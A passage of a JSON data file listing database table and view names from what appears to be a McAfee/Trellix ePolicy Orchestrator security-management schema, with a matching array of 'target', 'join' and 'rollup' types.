\t\\t\\t\\\"EPOProdPropsView_THREATPREVENTION\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentClassification\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_EvidenceReplicationFailed_Rollup\\\",\\r\\n\\t\\t\\t\\\"vmInfoawsazure\\\",\\r\\n\\t\\t\\t\\\"vminfoDetail\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestEmailDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"epoleafnode\\\",\\r\\n\\t\\t\\t\\\"OrionTaskLogTaskMessage\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaptureDataSetView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification\\\",\\r\\n\\t\\t\\t\\\"EPOComputerExtendedProperties\\\",\\r\\n\\t\\t\\t\\\"vmpropertiestf\\\",\\r\\n\\t\\t\\t\\\"EPOTagType\\\",\\r\\n\\t\\t\\t\\\"EPOTagAssignment\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserEmailStorageDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserGroupsView_Destination\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesVISUALIZATION\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentToLabel_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_AutoRegisterDocumentsClassification\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentRules\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNdlpAppliance_Capture\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDLPPS\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_MONITOR\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_azurermSquid\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserFileSystemDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"EPOServerEvents\\\",\\r\\n\\t\\t\\t\\\"UDLP_ExactDataFingerprints\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint\\\",\\r\\n\\t\\t\\t\\\"FW_Application\\\",\\r\\n\\t\\t\\t\\\"MVEDRCustomEvent\\\",\\r\\n\\t\\t\\t\\\"OrionBlockedIpAddress\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestFileSysDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"MDCC_VOLUME\\\",\\r\\n\\t\\t\\t\\\"TP_Events\\\",\\r\\n\\t\\t\\t\\\"MAEnforcementStatusView\\\",\\r\\n\\t\\t\\t\\\"vminfo1\\\",\\r\\n\\t\\t\\t\\\"UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"mdccgroupinfo\\\",\\r\\n\\t\\t\\t\\\"MVEDRProperties\\\",\\r\\n\\t\\t\\t\\\"EPOSoftwareView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_PREVENT\\\",\\r\\n\\t\\t\\t\\\"issueDetailCount\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRules\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DXLBROKER\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOTagsView\\\",\\r\\n\\t\\t\\t\\\"epoevents4\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRules_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalLabelInfoView\\\",\\r\\n\\t\\t\\t\\\"accountdetails\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud\\\",\\r\\n\\t\\t\\t\\\"EPOComputerLdapProperties\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentClassifications\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients_Capture\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMARAGG\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied_Rollup\\\",\\r\\n\\t\\t\\t\\\"mdccgroupproperty\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MCA\\\",\\r\\n\\t\\t\\t\\\"USAGE_METERING_ALF_VIEW\\\",\\r\\n\\t\\t\\t\\\"FW_Rule_Application\\\",\\r\\n\\t\\t\\t\\\"ePOComputerProperties\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMARSERVER\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMATD\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_EPOAGENT\\\",\\r\\n\\t\\t\\t\\\"epoevents\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesASSESSMENT\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_PREVENT\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PRODUCTS\\\",\\r\\n\\t\\t\\t\\\"EntitlementView\\\",\\r\\n\\t\\t\\t\\\"gridthreatlist\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentResolutions_Rollup\\\",\\r\\n\\t\\t\\t\\\"DXLBrokerCustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"tagAssignmentList\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentExport\\\",\\r\\n\\t\\t\\t\\\"MDCC_VOLUME_PROPERTY\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesEPOAGENT\\\",\\r\\n\\t\\t\\t\\\"EPOTaskAppliedTasks\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DXLCLIENT\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRemovableStorage\\\",\\r\\n\\t\\t\\t\\\"threateventlist\\\",\\r\\n\\t\\t\\t\\\"DXLClientCustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MAR\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DLPPS\\\",\\r\\n\\t\\t\\t\\\"ENSRollup_FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_hyperVSquid\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_WEBCONTROL\\\",\\r\\n\\t\\t\\t\\\"eventlist4\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences_Archive\\\",\\r\\n\\t\\t\\t\\\"MDCC_DPC_VM_VIEW\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_DISCOVERY\\\",\\r\\n\\t\\t\\t\\\"EPORollup_Events\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm_Archive\\\",\\r\\n\\t\\t\\t\\\"ENSRollup_WP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationDatabaseView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_ASSESSMENT\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestFileSysDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"AM_EndpointTechnologyStatus_View\\\",\\r\\n\\t\\t\\t\\\"ClientUICurrentLockOutStatus_View\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied\\\",\\r\\n\\t\\t\\t\\\"MARHostCacheItem\\\",\\r\\n\\t\\t\\t\\\"MARCacheInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice_Rollup\\\",\\r\\n\\t\\t\\t\\\"ENSRollup_AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMVEDR\\\",\\r\\n\\t\\t\\t\\\"issueCount\\\",\\r\\n\\t\\t\\t\\\"workloaddetailKubernetes\\\",\\r\\n\\t\\t\\t\\\"OrionTaskLogSubtaskMessage\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDXLCLIENT\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationSharePointView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals_Rollup\\\",\\r\\n\\t\\t\\t\\\"vminfovcenter\\\",\\r\\n\\t\\t\\t\\\"threatfilter\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_EvidenceReplicationFailed_Archive\\\",\\r\\n\\t\\t\\t\\\"EpoComplianceHistory\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MARAGG\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_kubernetesSquid\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_DISCOVERY\\\",\\r\\n\\t\\t\\t\\\"account\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentResolutions\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOTagsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalLabelInfoView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseManagement\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserPropertiesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EP_Scans\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentsQueries_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventComputers\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentClassifications\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentScan\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserGroupsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice\\\",\\r\\n\\t\\t\\t\\\"UDLP_ProductDistributionAllView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOSysTreePathsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentLabelsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryServersView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentLabelsView_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_ProductDistributionView\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentClassification_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfoQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOProductPropertiesAllView\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseResolution\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseToLabels\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRuleEvidencesQueriesView_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_EvidenceReplicationFailed\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventPolicyInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentToLabel\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentLabelsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRemovableStorage\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRemovableStorage_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentLabelsView_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers_Destination\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NdlpAppliance_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentStatuses\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NdlpAppliance\\\",\\r\\n\\t\\t\\t\\\"UDLP_RulesPerUser\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentClassification\\\",\\r\\n\\t\\t\\t\\\"UDLP_ExportEventDetails\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentApplications\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseStatus\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentClassifications_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestFileSysDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestEmailDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNdlpAppliance\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestEmailDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserEmailStorageDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRuleEvidencesQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserGroupsView_Destination\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentToLabel_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentRules\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummaryForMaReport\\\",\\r\\n\\t\\t\\t\\\"UDLP_ComputersToPoliciesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNdlpAppliance_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserFileSystemDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOProductPropertiesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_EvidenceReplicationFailed_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestFileSysDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryScansView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass_Archive\\\",\\r\\n\\t\\t\\t\\\"file_path\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_summaryFilter\\\",\\r\\n\\t\\t\\t\\\"file_parent\\\",\\r\\n\\t\\t\\t\\\"file_trust_level_count_summary\\\",\\r\\n\\t\\t\\t\\\"certificate_first_ref\\\",\\r\\n\\t\\t\\t\\\"associated_certificate_rep_enterprise\\\",\\r\\n\\t\\t\\t\\\"certificate\\\",\\r\\n\\t\\t\\t\\\"certificateJoined\\\",\\r\\n\\t\\t\\t\\\"file_rep_mwg\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_summary\\\",\\r\\n\\t\\t\\t\\\"associated_certificate_rep_gti\\\",\\r\\n\\t\\t\\t\\\"file\\\",\\r\\n\\t\\t\\t\\\"file_rep_summaryFilter\\\",\\r\\n\\t\\t\\t\\\"agent_new_certificate_summary\\\",\\r\\n\\t\\t\\t\\\"fileJoined\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_enterprise_parent\\\",\\r\\n\\t\\t\\t\\\"agent_new_file_summary\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_gti\\\",\\r\\n\\t\\t\\t\\\"file_rep_gti\\\",\\r\\n\\t\\t\\t\\\"certificate_trust_level_count_summary\\\",\\r\\n\\t\\t\\t\\\"file_rep_summary\\\",\\r\\n\\t\\t\\t\\\"certificate_rep\\\",\\r\\n\\t\\t\\t\\\"file_name\\\",\\r\\n\\t\\t\\t\\\"file_rep_enterprise\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_enterprise\\\",\\r\\n\\t\\t\\t\\\"file_rep\\\",\\r\\n\\t\\t\\t\\\"file_rep_ctd\\\",\\r\\n\\t\\t\\t\\\"cleanup_trending_summary\\\",\\r\\n\\t\\t\\t\\\"file_rep_atd\\\",\\r\\n\\t\\t\\t\\\"file_first_ref\\\"\\r\\n\\t\\t]\"",
    "type": "\"[\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t